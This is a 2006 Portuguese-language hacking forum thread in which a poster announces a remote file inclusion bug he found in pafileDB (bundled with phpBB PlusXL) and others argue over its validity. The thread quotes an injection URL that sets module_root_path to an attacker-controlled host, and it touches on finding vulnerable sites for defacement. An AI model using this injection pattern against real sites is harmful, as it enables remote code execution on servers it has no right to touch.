Novo Bug de Remote File Inclusion(php injection) Descoberto por Darkfire

Started by Anonymous, 09 de May , 2006, 05:42:24 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

Anonymous

09 de May , 2006, 05:42:24 PM
aew pessoal do darkers nos links abaixos vocês poderam vem o bug descoberto por eu, darkfire, aproveitem qe foi postado ontém no zone-h e hoje no milw0rm.... Nu tem muito sim bugado naum

http://www.zone-h.com/en/advisories/read/id=8986/

e

http://www.milw0rm.com/exploits/1774

by Darkfire <> Ir4dex Group <>

rog

#1
09 de May , 2006, 06:33:34 PM Last Edit: 09 de May , 2006, 08:18:40 PM by rog
isso ta meio confuso

1) Version : not specified
isso nao tem logica pelo menos a versao invadida

2) http://www.site.com/[phpBBpath]/[pafiledbpath]/includes/pafiledb_constants.php?module_root_path=http://[attacker]
o que tem a ver [phpBBpath] com isso ?

3) isso so vai funfar com o register globals passado a on (muito rare)

4) $link_language = 'lang_english';
nao vejo vulnerabilidade nisso

5) include( $module_root_path . 'language/' . $link_language . '/lang_pafiledb.' . $phpEx );
o todas as paginas que usam esse include sao vulneraveis com o register globals passado a on

qualquer_pagina.php?module_root_path=http://[attacker] ?inutil=

vai passar a ser

include( http://[attacker] ?inutil=language/$link_language/lang_pafiledb$phpEx );

nem vou commentar mais

rog
realty.sys is corrupt :  reboot the universe (Y/N)

Anonymous

#2
09 de May , 2006, 09:14:49 PM Last Edit: 09 de May , 2006, 09:23:15 PM by Anonymous
primeira coisa
Version: not spefied(sei lah comu escreve nu fui eu qe passei pro inglês)
pq naum tem versão especifica

segundo fiote naum estou afim de saber seus conhecimentos de php pq eu nem sei php direito soh sei descubri bug .(soh sei du fuçometro)

ah se vc perceber eh [phpbbpath] eh pq eh um script incluson nu phpBB o pafileDB
se vc tivesse olhado uh baguiu direito vc naum fazeria essa pergunta idiota

eu tirei uma parte do codigo onde tah uh bug! ih naum a parte soh barte bugada

ih se naum gosto du qe eu faleí problema eh seu pelo menos os gringos gostaram tudo foram até nu canal du meu crew agradecer.

bye...bye...

Anonymous

#3
15 de May , 2006, 04:31:26 AM
ahh
entaum eh um bug no pafiledb q eh usado no phpbb??

pq o pafiledb pode ser usado sem o phpbb
q aliás
eu nunca vi ele no phpbb oO

rog

#4
15 de May , 2006, 09:26:25 AM
o problema com essa falha mal documentada e que o pafiledb e um script antigo que evoluiu muito

entao como nao se sabe qual e a versao vulneravel, teria que baixar o codigo fonte das versao para qual dela contem a falha

rog
realty.sys is corrupt :  reboot the universe (Y/N)

bloodrain

#5
15 de May , 2006, 09:33:57 AM Last Edit: 15 de May , 2006, 09:35:36 AM by bloodrain
[pafiledbpath]
que diretorio seria esse?
como saber se o site esta vulneravel?
como descobrir sites vul?

hehehe  varias perguntas
hehehe uma das primeiras vezeses que eu concordo com o rog

Anonymous

#6
15 de May , 2006, 02:43:41 PM Last Edit: 15 de May , 2006, 02:50:58 PM by Anonymous
vamo um de cada vez

uh bug eh nu phpBB PlusXL onde vem incluso o pafileDB

Teve um que pergunto como pesquisa no google:
meu caro aí eh com vc, eu nu posso falar tudo se naum fica facil d+

pra pergunta como descobrir se ele está vuln:
soh injetando ah string fiote

pafiledbpath seria uh diretorio do pafiledb qe normalmente é /pafiledb/

ah ih pro comentario do Sr. Rog:
se eu dah uh negociu completo eu naum estarei encetivando o pessoal as pesquisar e nem a perguntar.

por isso qe os defacers taum em decadencia
Print
Go Up Pages1
User actions